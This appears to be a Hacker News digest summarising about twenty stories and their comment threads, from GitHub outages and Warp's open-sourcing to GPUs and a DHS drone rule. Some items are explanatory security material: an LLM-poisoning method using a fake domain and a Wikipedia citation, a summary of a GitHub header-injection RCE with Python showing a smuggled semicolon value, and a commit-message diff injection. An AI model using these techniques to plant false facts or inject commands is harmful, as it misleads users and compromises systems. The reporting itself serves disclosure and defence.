Hacker News

Mitchell Hashimoto, GitHub user #1299 since February 2008, announced Ghostty will leave GitHub due to near-daily outages that block his team from working. He describes GitHub as profoundly personal — he credits it with shaping his career, started Vagrant partly hoping it would get him hired there, and has spent much of his daily life on the platform. Over the past month he tracked outages in a journal, finding nearly every day marked with an "X" for service disruption, including a two-hour GitHub Actions failure on the day he wrote the post. He clarifies the decision predates the large April 27, 2026 Elasticsearch outage and was months in the making. Ghostty plans an incremental migration while keeping a read-only GitHub mirror; the final destination — commercial or FOSS — is still being finalized. His personal projects will remain on GitHub for now, and he expressed hope GitHub will eventually improve.

Comments: Commenters broadly validate Hashimoto's frustrations, citing GitHub's post-Microsoft-acquisition decline — attributed to resource diversion toward Copilot, organizational culture shifts, and possibly AI-generated code degrading the codebase. An unofficial GitHub status tracker is cited as evidence of systematic degradation. Users note they are already migrating or evaluating alternatives including Codeberg, Forgejo, self-hosted GitLab, Sourcehut, and the ATProto-based Tangled. A GitHub staff research engineer acknowledged internally that PRs and issues aren't ideal future primitives. Concerns are raised about ecosystem fragmentation, loss of discoverability, and the difficulty of managing accounts across multiple forges. Some argue GitHub's proprietary centralization was always a free-software liability; others see Microsoft's broader engineering culture as the root cause. A few defend GitHub as still functional for their use cases, while several users note the irony of Hashimoto needing to clarify which of multiple recent outages he was referencing.

Open source hosting evolved from personal Trac/Subversion setups and SourceForge to GitHub's centralized dominance, now facing fragmentation. Pre-GitHub, dependencies carried real commitment — projects had known maintainers, release processes, and reputation weight; micro-dependency culture didn't exist. GitHub eliminated publishing and consumption friction and accidentally became a long-term archive where abandoned projects and discussions stayed discoverable. Today it faces criticism for product instability, Copilot AI noise, absent leadership, and maintainer-hostile workflows; Ghostty, Strudel, and Tenacity are migrating to Codeberg. Decentralization risks losing fragile social context — issues, reviews, and design discussions disappear far more easily than code. Google Code and Bitbucket show how corporate-tied project homes fail. The author calls for a publicly funded, endowment-backed archive so open source memory doesn't depend on GitHub's continued health.

Comments: Commenters respond with both nostalgia and critique. Several users fondly recall Trac, noting Django has run on it for over 20 years, and highlighting how its setup friction was a genuine barrier to entry. Google Code's abandonment is cited as another example of centralized platforms failing the open source community. The sharpest pushback challenges the article's historical accuracy: one commenter argues the open source ecosystem wasn't significantly smaller immediately before GitHub's emergence than immediately after, that most FOSS isn't obtained from GitHub today, and that the author only knew the project names they personally encountered — not a universal truth. That same commenter disputes the implication that reputation no longer matters in today's ecosystem, and notes the historical framing ignores Red Hat's prominence, the fact that Windows users were then (as now) the majority, and the existence of BSD distributions — concluding the article offers an inaccurate description of history.

A security researcher fabricated a "6 Nimmt! World Championship" via a $12 domain and one Wikipedia edit, tricking multiple frontier LLMs into confidently repeating the false claim. The circular citation exploit places a fake press release on a custom domain, cites it from Wikipedia, and LLMs interpret two apparently corroborating sources that are actually one. Three stacked failure modes amplify the risk: retrieval (LLMs inherit search-result trustworthiness), training corpus (Wikipedia edits absorbed permanently into future model weights), and the agent layer (agents acting on poisoned sources can trigger harmful real-world actions). The attack took only twenty minutes—far cheaper than training-time poisoning. Scaled by state actors, coordinated campaigns across low-traffic articles could corrupt narratives on politics, health, or survival. Proposed mitigations include provenance-first UX, heuristic filters for Wikipedia edits citing freshly registered domains, and updated Wikipedia policy on single-source citations. The Wikipedia edit was removed within minutes of publication, but models trained before the revert permanently retain the fabricated fact.

Comments: Commenters note this attack isn't novel—one user named a whale "Teresa T" via a blog post and YouTube caption, fooling search-enabled LLMs for weeks. Many draw parallels to SEO manipulation, noting LLMs inherit the same vulnerabilities that already plagued Google rankings. Some question whether it qualifies as true "LLM poisoning," since the models were reporting live web results rather than hallucinating from corrupted weights. A BBC journalist reportedly ran a similar experiment in February 2026. Core concern centers on state actors who could execute this at scale, rewriting geopolitical, electoral, or health narratives—Wikipedia-based political poisoning is noted as already happening. The broader worry is that most people lack AI media literacy, and current citation UX—tiny opaque buttons rather than explicit provenance scoring—makes verification nearly impossible. Historical fabricators like Frank Dux and Frank Abagnale are invoked as precedent, with one commenter noting much of recorded history may rest on similarly thin evidence. A dissenting voice questions whether deliberately poisoning LLMs serves any constructive purpose.

Warp, an agentic development environment born from the terminal, has open-sourced its client codebase under a dual license: the UI framework crates (warpui_core and warpui) under MIT, and the remainder under AGPL v3. OpenAI is the founding sponsor of the new repository, with agentic management workflows powered by GPT models. Users can bring their own CLI agents, including Claude Code, Codex, and Gemini CLI. The contribution workflow uses readiness labels — ready-to-spec and ready-to-implement — to guide community contributors from issue triage through code submission. Building from source requires three scripts: bootstrap for platform setup, run for building, and presubmit for formatting, linting, and tests. Warp highlights several open-source dependencies that helped it launch, and maintains a Code of Conduct enforced via email reporting.

Comments: Users are sharply divided, with prominent criticism directed at Warp's origins as an Alacritty fork that secured $50M in venture funding without contributing back to the upstream open-source project, and some see the OpenAI founding sponsorship as similarly exploitative. Many former users have migrated to Ghostty or iTerm2, citing an overwhelming, frequently-shifting UI and AI features being aggressively surfaced — one paying user notes their ESC key is wearing out from dismissing unwanted AI prompts. On the positive side, users praise specific features like vertical tabs, the agents layout with automatic worktree management, and the code review panel as genuinely workflow-improving. Several commenters question whether Warp is still a terminal at all, observing it now resembles Cursor or Codex more than a shell host. Questions were raised about the motivations behind open-sourcing — including whether Devin CLI influenced the decision — and how the repository accumulated 29k stars within roughly two hours of launch.

Intel's Arc Pro B70 doubles the B50's Xe2 cores and VRAM to 32 GB at $950, targeting AI inference with 230W TDP and 608 GB/s bandwidth. It undercuts AMD's R9700 by ~30% while matching its 32 GB VRAM, and beats NVIDIA's RTX 2000 Blackwell on VRAM at $200 more. In most professional workloads—Premiere, DaVinci Resolve, Blender, Unreal Engine—it outperforms the 2000 Blackwell but trails the R9700, fitting its price tier. NVIDIA leads in After Effects and Lightroom Classic; the B70 leads in Revit and dominates MLPerf inference, beating R9700 and 4000 Blackwell by 7% and the 2000 Blackwell by 98% in token generation. Intel's Xe2 architecture (SIMD16, next-gen XMX engines) and driver work contribute measurable gains over Alchemist. The card includes ECC memory, dual 8K media engines, and certified drivers for Adobe, Autodesk, and Dassault Systèmes ISVs. Reviewers note the B70 is "unbalanced" for general use—VRAM exceeds raw compute for many workloads—but 32 GB makes it compelling for multi-GPU inference workstations targeting 70B+ models at 96–128 GB pooled VRAM.

Comments: Users highlight time-to-first-token as a critical inference metric, though the 230W TDP draws concern for multi-GPU deployments due to heat density. Intel's drivers are widely cited as a significant limitation for LLM use cases, with the software stack seen as holding back real-world performance. Supply availability is questioned, with speculation that initial stock will sell out quickly given timing relative to recent DRAM price increases. Intel's long-term GPU market commitment is raised as an open question, reflecting ongoing uncertainty about its pro GPU roadmap. A Linux-focused commenter points to llama.cpp benchmarks as an alternative performance reference. Hobbyists find the 32 GB VRAM appealing but consider the power draw a scaling obstacle for densely deployed inference rigs. One user asks whether professional AI cards can double as gaming cards or are intentionally restricted for market segmentation.

A developer built a playable DOOM MCP app that renders inline in ChatGPT and Claude, with a plain URL fallback for clients without inline support. It uses cloudflare/doom-wasm for the runtime and Freedoom Phase 1 to stay redistributable. The architecture is lean: a TypeScript MCP server with two tools—create_doom_session for inline hosts and get_doom_launch_url for fallback—a /doom/play browser shell, a signed-token session, and Netlify hosting. The main challenge was session compatibility across clients with different iframe, CSP, and UI rules; the solution was running the DOOM canvas directly in the host iframe rather than nesting iframes, eliminating a class of frame-src and CSP failures. Debugging involved WAD path resolution, blob-backed preload issues, and Netlify packaging; the blob preload was replaced by writing WAD/config directly into the Emscripten filesystem. Features like save/load and screenshots were cut in favor of a leaner, more stable design. The project partially works on ChatGPT and Claude iOS apps as well.
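
For readers curious what the two-tool surface looks like, here is a minimal sketch in Python using the MCP Python SDK's FastMCP helper. The real project is a TypeScript server; the base URL, token scheme, and handler bodies below are hypothetical stand-ins, not the author's implementation.

```python
# Minimal sketch of the two-tool shape described above, written against the
# MCP Python SDK (the real project is a TypeScript server). The base URL and
# the token logic are hypothetical stand-ins.
import secrets
from mcp.server.fastmcp import FastMCP

BASE_URL = "https://example.netlify.app/doom/play"  # hypothetical host

mcp = FastMCP("doom")

@mcp.tool()
def create_doom_session() -> str:
    """For hosts that can render inline: return an embeddable play URL
    carrying a (stand-in) signed session token."""
    token = secrets.token_urlsafe(16)
    return f"{BASE_URL}?session={token}"

@mcp.tool()
def get_doom_launch_url() -> str:
    """Fallback for clients without inline rendering: return a plain URL
    the user can open in a browser."""
    return BASE_URL

if __name__ == "__main__":
    mcp.run()
```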

Comments: Commenters broadly find the project impressive while offering a key technical clarification: DOOM is not running "on" AI—it runs via cloudflare/doom-wasm inside an iframe surfaced through an MCP app, which is simply HTML in an iframe registered as an MCP resource. Several note MCP's underexplored potential for in-chat interactive apps beyond simple tool calls, citing working examples like a no-auth MCP clock and a Constitution-browsing UI as further proof of the pattern. Priority disputes arise, with one commenter pointing to a DOOM-in-MCP video from a month prior and another noting they put Bad Apple in an MCP app two weeks ago, prompting frustration about ideas being quickly copied and karma-farmed. Some express mild disappointment that the AI itself isn't autonomously playing DOOM over MCP, while others are simply confused about what is technically happening. The technical consensus is that the project's real value is demonstrating MCP apps as genuine interactive surfaces with layout, input, and security constraints analogous to the open web, and that games are an effective way to stress-test new protocol limits.

CJIT is a tiny, portable C compiler and interpreter—under 2MB in a single binary—built by Jaromil and the Dyne.org crew, inspired by Terry Davis's HolyC and based on Fabrice Bellard's TinyCC. It targets Windows, macOS, and Linux without requiring a license agreement or IDE, and supports hooking into any dynamic library for rapid C development. The project supports graphical apps via SDL (originally by Sam Lantinga, 1998), with batteries-included demos. Linux compatibility is limited to Ubuntu 24.04 specifically; the binary fails on Arch due to a missing libgcc_s.so.1 path seemingly loaded via dlopen. TUI demos work but SDL examples have unresolved symbol issues. The website has UX rough edges including a broken tutorial nav link and a visually compressed font. The hello-world example uses fprintf(stderr,...) rather than stdout, which diverges from convention.

Comments: Commenters suggest pairing CJIT with Fil-C to achieve a fully memory-safe C scripting experience. The Terry Davis/HolyC inspiration draws surprised recognition, with users linking to the TempleOS and Terry Davis Wikipedia pages. A significant compatibility concern is raised: the Linux binary is Ubuntu 24.04-specific and fails on Arch Linux with a missing libgcc_s.so.1 error, with TUI demos working but SDL examples failing symbol resolution after some troubleshooting. The Mir project is mentioned as a more comprehensive alternative offering custom JIT tooling with its own C compiler. Website issues flagged include a broken tutorial header link and a font that feels visually compressed. The non-standard hello-world using fprintf(stderr,...) drew mild criticism. Some speculate the site design may be AI-generated. Overall interest in trying the project is positive, with one user noting the SDL graphical support as a strong included feature.

Wiz Research discovered CVE-2026-3854, a critical RCE flaw in GitHub's git infrastructure affecting GitHub.com and GitHub Enterprise Server. The flaw is in babeld, the git proxy, which embeds push option values (git push -o) verbatim into the X-Stat header — a semicolon-delimited key=value protocol — without sanitization. The header's last-write-wins semantics mean an injected semicolon creates attacker-controlled fields. Chaining three injections (rails_env, custom_hooks_dir, repo_pre_receive_hooks) bypasses the pre-receive sandbox, redirects hook lookup, and executes arbitrary binaries as the git user. On GitHub.com, injecting an enterprise-mode flag completed the chain on shared storage nodes hosting millions of cross-tenant repositories. Wiz confirmed the git user's permissions would expose any repository on a compromised node, validating with only their own test accounts. GitHub fixed GitHub.com within 6 hours of the March 4 report and released GHES patches March 10, but 88% of instances remain unpatched at disclosure. The discovery was enabled by AI-augmented reverse engineering via IDA MCP, making this one of the first critical CVEs uncovered in closed-source binaries with AI assistance.
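
The injection class is easiest to see in miniature. The sketch below is not GitHub's code (the real X-Stat format is internal to babeld); it only illustrates how verbatim interpolation into a semicolon-delimited key=value header, combined with last-write-wins parsing, hands an attacker control of arbitrary fields.

```python
# Illustration of the injection class described above (not GitHub's actual
# code): push-option text is interpolated verbatim into a semicolon-delimited
# key=value header, and a last-write-wins parser lets an embedded semicolon
# smuggle in attacker-controlled fields.

def build_header(fields: dict, push_option: str) -> str:
    fields = {**fields, "push_option": push_option}  # no sanitization
    return "; ".join(f"{k}={v}" for k, v in fields.items())

def parse_header(header: str) -> dict:
    parsed = {}
    for part in header.split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            parsed[k] = v  # last write wins
    return parsed

benign = build_header({"repo_id": "42", "rails_env": "production"}, "ci-skip")
evil = build_header({"repo_id": "42", "rails_env": "production"},
                    "x; rails_env=development; custom_hooks_dir=/tmp/attacker")

print(parse_header(benign)["rails_env"])        # production
print(parse_header(evil)["rails_env"])          # development -- injected value wins
print(parse_header(evil)["custom_hooks_dir"])   # /tmp/attacker
```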

Comments: Commenters highlight the AI-augmented reverse engineering methodology as a watershed moment, noting LLMs accelerate the hardest step in security research — understanding closed-source system internals — after which the vulnerability itself is often trivial to identify. Many call the underlying flaw textbook injection: user input glued into a delimiter-based protocol without sanitization, with the observation it would have been found quickly on a more accessible attack surface. The statistic that 88% of GHES instances remain unpatched seven weeks after a critical fix is widely flagged as alarming. Questions arise about whether GitHub can determine if exploitation occurred before disclosure. GitHub's dominant market position amplifies concern, with users noting any replacement platform faces the same underlying risks. Wiz Research's track record and tooling quality are praised despite rapid company growth. The broader systemic lesson emphasized is that multi-service architectures passing shared data formats between components create dangerous assumption chains, and treating user-supplied data as trusted instructions is a recurring root cause across codebases.

Google announced in August 2025 that starting September 2026, all Android developers globally must register with Google, pay a fee, submit government ID, and list signing keys — covering every distribution channel, not just the Play Store. This threatens F-Droid, hobbyist projects, corporate internal apps, and open-source tools. Over 69 organizations from 21 countries signed an open letter opposing it, with F-Droid calling it an "existential" threat. Google offers an "advanced flow" opt-out, but critics note the 9-step process includes a mandatory 24-hour wait and runs through proprietary Play Services, allowing Google to silently revoke it. The EFF and Cory Doctorow argue certifying developers rather than code does nothing for security but creates an identity database governments can exploit to target privacy-tool developers and activists. Developers from sanctioned countries, minors, and pseudonymous contributors face systematic exclusion. EU regulators are examining potential Digital Markets Act violations, while critics frame the move as Google consolidating monopoly control following its loss in the Epic Games antitrust case.

Comments: Commenters offer a more measured view, noting the article overstates the situation: an opt-out does exist, and ADB can bypass the 24-hour cooling period. Many observe Android was never truly open since locked bootloaders long foreclosed full device control. GrapheneOS is widely cited as a practical alternative, though banking and government apps frequently refuse to run on modified devices. Users in countries with internet restrictions note sideloading is practically necessary for censored or banned apps. Concern is raised about a negative network effect: if the opt-out deters most users, fewer developers will distribute outside Play, further shrinking the open ecosystem. Niche communities — including DIY diabetic medical-software users — warn life-critical apps will be caught in the dragnet. Some call the campaign "fearmongering," others say the urgency is warranted. The EU Digital Markets Act's applicability is flagged, and speculation runs that Windows could follow a similar path. One commenter dryly notes the campaign site was clearly built with AI.

GitHub exposes mail-style patch exports at .patch URLs, and a security researcher discovered that GNU patch cannot reliably distinguish between the actual diff exported from a commit and diff-shaped text embedded in the commit message. Using a public demo repo, the real commit changes only readme.md, but a fake unified diff embedded in the commit message creates SHOULD_NOT_BE_HERE.md — and running wget plus patch -p1 on the exported .patch file applies both silently. The researcher also tested targeting .git/hooks/post-applypatch locally, which patch accepted without complaint. git apply and git am behaved slightly better by rejecting .git/... paths, but both still accepted injected diffs for ordinary working-tree files. The vulnerability is noteworthy because wget/curl plus patch is a common, decades-old workflow for moving patches between machines. Responsibility for the flaw is unclear — it could belong to GNU patch, GitHub's .patch export format, or the broader patch-format contract itself.

Comments: Commenters note this issue has surfaced multiple times before and attribute the root cause to Unix tooling's tradition of boutique, undocumented file formats — arguing that if patches were structured as XML or JSON, the ambiguity wouldn't exist. One suggests GitHub should indent commit message bodies in exported .patch files (as git show effectively does), since git format-patch currently does not, leaving no clear in-band signal for where the message ends and the diff begins. A technical deep-dive explains that git am uses three heuristics to delimit commit messages from diffs — a bare --- line, a line starting with diff -, or one starting with Index: — meaning any unindented diff in a commit message will be applied. Crucially, GNU patch 2.7.6 goes further: it actively handles consistently indented diffs, CRLF line endings, and RFC 934 encapsulation, making it more permissive than git am. Commenters point out that Larry Wall wrote patch with intentional DWIM ("Do What I Mean") behavior, so the liberal parsing is by design rather than a bug.
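
A small sketch makes the failure mode concrete. The function below approximates the delimiters described in the thread (a bare --- line, or a line starting with diff - or Index:); it is an illustration rather than the actual git am source, and the sample commit message is fabricated for the demo.

```python
# Rough approximation of the delimiter heuristics described above (not the
# actual git am source): the first line matching one of these patterns is
# treated as the end of the commit message and the start of the diff, so an
# unindented diff-shaped block inside a commit message becomes patch content.

def split_message_and_diff(patch_text: str) -> tuple[str, str]:
    lines = patch_text.splitlines(keepends=True)
    for i, line in enumerate(lines):
        if line.rstrip("\n") == "---" or line.startswith(("diff -", "Index: ")):
            return "".join(lines[:i]), "".join(lines[i:])
    return patch_text, ""

msg = (
    "Fix typo in readme\n"
    "\n"
    "By the way, here is some diff-shaped text in the message body:\n"
    "diff --git a/SHOULD_NOT_BE_HERE.md b/SHOULD_NOT_BE_HERE.md\n"
    "new file mode 100644\n"
    "--- /dev/null\n"
    "+++ b/SHOULD_NOT_BE_HERE.md\n"
    "@@ -0,0 +1 @@\n"
    "+oops\n"
)

message, diff = split_message_and_diff(msg)
print(diff.splitlines()[0])  # the embedded fake diff is picked up as patch content
```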

Waymo has announced expansion to Portland, Oregon, beginning with manually-driven mapping operations before autonomous deployment. The company cites a 13x reduction in serious injury crashes in existing markets and has secured support from Mayor Keith Wilson and MADD, framing the service as a tool for Portland's Vision Zero traffic fatality goals. The announcement lands as TriMet faces a $300M budget shortfall—cutting staff, routes, and light rail service—while a state payroll tax repeal ballot measure threatens further funding losses. Portland's city council is simultaneously debating driver pay caps for Uber and Lyft. The city's mix of streetcars and light rail raises operational concerns, given a 2026 Phoenix incident where a Waymo became stuck on tracks. Privacy worries surround in-car cameras despite Waymo's stated "no plans" for ad targeting. Critics also challenge the blog post's characterization of Portland as "always a pioneer in urban design," citing the city's documented history of explicitly racist planning and segregation.

Comments: Commenters contextualize Waymo's arrival against TriMet's $300M funding crisis—cuts worsened by a pending payroll tax repeal—and Portland's city council debate over rideshare driver pay caps, with some seeing Waymo as filling both gaps at human workers' expense. Portland's light rail and streetcar infrastructure raises safety concerns given a Phoenix incident where a Waymo got stuck on tracks. Privacy skepticism runs high, with sarcasm directed at Waymo's "no plans" to use interior camera footage for ads. Others question Google's estimated $30–40B decade-long subsidy. Anticipated community resistance—protests, vandalism, traffic cone placement—is widely discussed, with Portland's strong tech skepticism and anti-AI sentiment as compounding factors. One commenter challenges the post's claim that Portland has "always been a pioneer in urban design," linking to evidence of the city's explicitly racist early planning history. Questions about service footprint, intercity expansion, and whether TriMet's $2.50 MAX fare makes Waymo uncompetitive also feature prominently.

Anthropic's Claude services suffered a 78-minute outage on April 28, 2026, from 17:34 to 18:52 UTC, affecting claude.ai, Claude Console, the Anthropic API, Claude Code, Claude Cowork, and Claude for Government. The incident began as an inability to access Claude.ai, escalated to include elevated API errors and authentication failures on login paths for Claude Code, and was fully resolved by 18:52 UTC. Anthropic identified the root cause during the incident and posted status updates at roughly 10–20 minute intervals. All services were confirmed returned to normal with continued monitoring after resolution.

Comments: Enterprise users spending $200K+/month express frustration at repeated outages and poor support, with observers noting Claude has dropped to roughly one nine of uptime over 90 days. Many have adopted multi-model strategies pairing Anthropic with Codex and Gemini, or shifted to self-hosted H100 clusters running open models, citing low LLM switching costs versus traditional multi-cloud overhead. The CLI-based Yaw terminal mode remained functional during the outage while the browser was fully unavailable. Debate erupted about Anthropic's reliability at its ~$1 trillion valuation, drawing comparisons to early World of Warcraft server instability — frustrated but captive users. Users question whether recurring authentication failures reflect fundamental inference-serving challenges or gaps in SRE investment, and some used the downtime to test Codex, Gemini, and local Qwen as alternatives. Concerns also arose about model routing transparency, with suspicion that cheaper models may sometimes substitute for premium tiers like Opus without user awareness.

The author officially retired from Emacs after 20 years, completing a gradual transition to Vim and modal editing. To fully cut ties, he built two native C++ GUI applications with wxWidgets: stackcalc (a replacement for M-x calc using GMP and MPFR for multi-precision arithmetic) and Elfeed2 (a rewrite of his popular RSS reader Elfeed, maintained for 13 years). The Emacs Calculator lacked any suitable external replacement, so his clone covers personal usage but omits esoteric features like symbolic processing. Elfeed2, completed in just a couple of days with AI assistance, already surpasses the original despite not yet hitting 1.0. He chose wxWidgets over Qt (lighter weight, CMake FetchContent compatible) and Dear ImGui (unsuitable for passive-rendering apps left running all day), noting wxWidgets works better than expected despite character encoding issues and accidental quadratic-time operations. Both projects build with just a C++ toolchain and CMake on Windows, macOS, and Linux. He is seeking new maintainers for his remaining active Emacs packages; if none step forward, projects will be archived but not deleted.

Comments: Comments note this as a significant loss for the Emacs community, particularly for Elfeed users, with hope a new maintainer emerges. The author has broadly "spring cleaned" — moving from Xorg/Openbox to KDE on Wayland and reducing terminal-centric tooling. Several users ask why wxWidgets over Qt, noting its older clunkiness, while the author cited lighter weight and CMake FetchContent compatibility. The "newly-acquired superpowers" are identified as AI/LLM assistance — per a linked post, the author no longer personally writes code professionally, calling this the future of software engineering. This draws sharp pushback, with some calling it "AI psychosis" and predicting a post-bubble reckoning. Others observe LLMs enable fragmentation away from unified platforms like Emacs Lisp, where a shared semantic model allowed cross-layer reuse. The Emacs vs. Vim debate resurfaces, with some finding Emacs more efficient for real-time coding despite Vim's speed. A request surfaces for a standalone magit replacement usable outside any editor.

LocalSend is a free, open-source cross-platform file transfer app that operates without internet by communicating over a local network using a REST API with HTTPS encryption and on-the-fly TLS/SSL certificates per device. It supports Windows, macOS, Linux, Android, iOS, and Fire OS, distributed via Winget, Homebrew, Flathub, Play Store, F-Droid, and others. It communicates over port 53317 (TCP/UDP) and requires AP isolation to be disabled on the router for device discovery; Windows users must set their network to "Private." Built with Flutter and Rust, it offers a portable mode via a settings.json file placed alongside the executable, and a --hidden flag for tray-only startup. Minimum platform versions include Android 5.0, iOS 12.0, macOS 11 Big Sur, and Windows 10 (v1.15.4 is the last release supporting Windows 7). The LocalSend protocol is publicly documented, and contributions are welcomed via Weblate for translations or GitHub pull requests for bug fixes.

Comments: Users broadly find LocalSend reliable and fast for cross-platform transfers between Windows, macOS, Android, and iOS, often calling it superior to KDE Connect in consistency. The central limitation cited is its requirement for a shared local network — unlike AirDrop, which creates its own ad-hoc connection — forcing users to tether or set up a mobile hotspot as a workaround. Reported bugs include interrupted transfers leaving corrupt files on the receiver, macOS sleep being blocked while the app runs, and unreliable behavior when Tailscale is active. Several alternatives are discussed: PairDrop (browser-based, supports non-LAN via public rooms), Sendme/Iroh (P2P relay with no central server), aero.zip (E2E encrypted, WAN, up to 10 Gbps, 2 GB free), Blip (P2P, cross-platform, no size limit), Magic Wormhole, and WebRTC-based tools like sendfiles.dev. Speed comparisons with AirDrop are unfavorable, as AirDrop uses different underlying peer selection technology. Users suggest compressing directories into archives before sending for significantly faster transfers, and note that both devices require manual preparation before each session rather than being always-ready.

Warp, the AI-powered developer terminal, is open-sourcing its client under an AGPL license at github.com/warpdotdev/warp, with OpenAI as founding sponsor. The company's novel approach uses its "Oz" cloud agent orchestration platform—powered by GPT models—to let community members supervise agents rather than write code directly, with humans focusing on product direction and verification. Warp cites competitive pressure from better-funded closed-source rivals and limited internal bandwidth as primary drivers. Alongside the launch, Warp is shipping support for more open models (Kimi, MiniMax, Qwen) with an "auto (open)" routing mode, a programmatic settings file, and UI customization ranging from a minimal terminal to a full agentic development environment (ADE). Public GitHub issues will become the official roadmap, moving product discussions into the open. Warp's founders note the plan to open-source has been in place since the company's founding five years ago, and believe a diverse contributor community plus structured agent orchestration will produce results beyond what an internal team could achieve alone.

Comments: Users broadly welcome the open-source announcement and praise Warp's terminal UX, though reactions to the AI-heavy direction are mixed. Several want a lightweight fork stripped of agentic features, with disappointment expressed that no commit history was included—which would have allowed branching from the pre-AI codebase. Some note that AI features are opt-in and only activate after login, while others find that updates repeatedly re-enable features they've disabled. There's curiosity about the long-term business model—whether it targets acquisition or shifts to LLM-token revenue like competitors such as OpenCode. Users compare Warp's full ADE approach to minimalist alternatives like Ghostty, and one shares a superset.sh workflow enabling parallel agent workspaces with automatic ticket pulling, port reservation, and environment setup across multiple worktrees. A few comments note confusion with OS/2 Warp due to the unqualified title, and the thread is flagged as a duplicate of an earlier HN post with more comments.

VibeVoice is Microsoft's open-source family of frontier voice AI models covering TTS and ASR. The core innovation is continuous speech tokenizers at 7.5 Hz paired with a next-token diffusion framework: a Qwen2.5 LLM backbone handles context while a diffusion head generates audio. The ASR model (7B) processes 60 minutes in a single 64K-token pass, jointly performing transcription, speaker diarization, and timestamping across 50+ languages with custom hotwords — preserving speaker continuity lost by chunk-based models. The TTS model (1.5B), an ICLR 2026 Oral, synthesized 90-minute multi-speaker audio with up to 4 speakers but was removed after misuse for deepfakes. A 0.5B Realtime model remains, offering streaming TTS with roughly 300 ms latency to first audio and voices in 9 languages. The ASR is now in Hugging Face Transformers with vLLM support. Microsoft warns against commercial use, citing deepfake risks and biases inherited from the Qwen2.5 base model.

Comments: Several users challenge the "open source" label, arguing only weights are released while training code is proprietary — making it "open weight" at best. ASR criticisms include hallucinations, high inference cost, and weak multilingual accuracy. Voxtral by Mistral is repeatedly cited as a superior alternative small enough to run on WebGPU. Conversely, hands-on users praise the built-in diarization as a major advantage over Whisper plus separate Pyannote pipelines, citing better out-of-the-box reliability for podcast and meeting transcription. The TTS removal draws wry commentary — described as a "rug pull for safety" — with questions about what has changed since. A cybersecurity researcher's investigation into the repository and a separate "vibing.exe" app accused of harvesting screen, audio, and clipboard data are both linked. Comparisons to Parakeet and Whisper remain unresolved. The name "VibeVoice" is widely mocked as emblematic of Microsoft's poor product naming, with users noting the irony it wasn't called "Copilot Voice."

Neuroscientists described BTSP (behavioral timescale synaptic plasticity), a newly identified form of neuroplasticity that enables single-experience learning. It was discovered in 2014 by Jeffrey Magee's team recording hippocampal dendrites in live rodents: a single dendritic plateau potential caused place cells to fire at a location 99.5% of the time after one exposure — learning previously thought to require repeated Hebbian firing. Unlike Hebbian plasticity (milliseconds), BTSP spans six to eight seconds, better matching real behavioral timescales. The mechanism involves eligibility traces tagging recently active synapses, which are strengthened when a plateau potential spreads voltage across the dendrite; CaMKII protein plays a key molecular role by increasing receptor surface area. BTSP may also solve the credit assignment problem by reinforcing only contextually relevant neurons. BTSP has been confirmed mainly in the hippocampus, and some researchers debate whether it truly differs from a broadly defined Hebbian framework. Most agree BTSP complements rather than replaces Hebbian learning, with Hebbian plasticity dominating early brain development and BTSP more prominent in adult episodic memory formation.
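
For readers who prefer the mechanism in symbols, a schematic formalization consistent with the description above (an eligibility trace that decays over seconds and is converted into a weight change by a plateau potential) might read as follows; this is illustrative, not the article's specific model.

```latex
% Schematic formalization (illustrative; not the article's equations):
% each synapse i carries an eligibility trace e_i(t), bumped by presynaptic
% activity x_i(t) and decaying with a time constant tau_e on the order of
% seconds; a plateau potential P(t) converts whatever is still eligible
% into a lasting weight change.
\begin{align*}
  \tau_e \, \frac{de_i}{dt} &= -e_i(t) + x_i(t) \\
  \Delta w_i &\propto \int e_i(t)\, P(t)\, dt
\end{align*}
```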

Comments: Nothing to summarize!

Lumara is a free, privacy-first iOS and Android app built by a solo U.S. Army veteran developer that displays live solar imagery from NASA's Solar Dynamics Observatory — updated every ~15 minutes across 12 wavelengths ranging from the 5,000 K surface to 10 MK flare plasma. It tracks moon phases offline using Jean Meeus's Astronomical Algorithms (accurate to minutes), and monitors solar flares (B–X scale), coronal mass ejections (up to 3,000 km/s), and geomagnetic storms (G1–G5) via NASA's DONKI database in real time. Users select a city from a local list — no GPS, no account, no data transmission — and all solar and lunar images are fetched directly from NASA/ESA servers. The app is completely free with no premium tier, no ads, and no in-app purchases, and is now live on both the App Store (universal iPhone/iPad) and Google Play.

Comments: Users broadly praise the app's clean UI and design, though one raises a performance concern: the site hotlinks multiple 30MB 2K-resolution videos directly from NASA's SVS servers, suggesting optimization is needed. A developer asks about the moon phase API for their own project, while another recalls a similar SOHO classroom display project that never shipped. UI feedback includes requests for additional ways to exit full-page views (beyond ESC), removing the glowing box outline around wavelength buttons, and minor alignment fixes. Several users wish the app supported desktop wallpapers or screensavers. One detailed comment flags inconsistent metric usage throughout — mixing kelvins with Celsius, km/s with km/h, and using "M" ambiguously for both "million" and "mega" — and calls for adherence to SI standards for clarity. Feature requests include CME tracking, tooltips explaining each wavelength, and a Home Assistant HACS integration. One user notes the data is technically "live minus ~500 light-seconds," and the iOS App Store link was initially broken before being fixed at launch.

In January 2026, federal agents shot and killed Renee Good, a 37-year-old mother of three, during Minneapolis protests against immigration raids; DHS immediately labeled her an "anti-ICE rioter" who committed "an act of domestic terrorism" before fully gathering facts. Days later, on January 16, DHS expanded no-fly zones to prohibit drones within 3,000 lateral feet and 1,000 vertical feet of federal facilities. Critically, for the first time these zones extended to DHS ground vehicles — even unmarked ones, even while in motion, and even on routes that had not been publicly announced. Government agencies were granted authority to shoot down or seize drones deemed a "credible safety or security threat," with civil and criminal penalties for operators. This created effectively invisible, moving no-fly zones impossible for the public to anticipate or avoid. The policy immediately chilled journalists like Rob Levine, a Minneapolis-based freelance photojournalist with nearly 40 years of experience, who has used DJI quadcopter drones since 2016 to document protests, rivers, and city life, and who stopped flying immediately upon seeing the notice.

Comments: Commenters highlight the fundamental absurdity of the DHS policy: because the no-fly zones apply to unmarked vehicles moving along unannounced routes, it is practically impossible for the public to know when or where they are in violation. The dark irony observers note is that affected individuals may only learn the relevant prohibited time and location after being charged — and that such information could itself be classified. Others express incredulous disbelief at both whoever authored the policy and the chain of command that approved it, suggesting the rule creates sweeping enforcement power with no reasonable mechanism for the public to achieve compliance in advance.

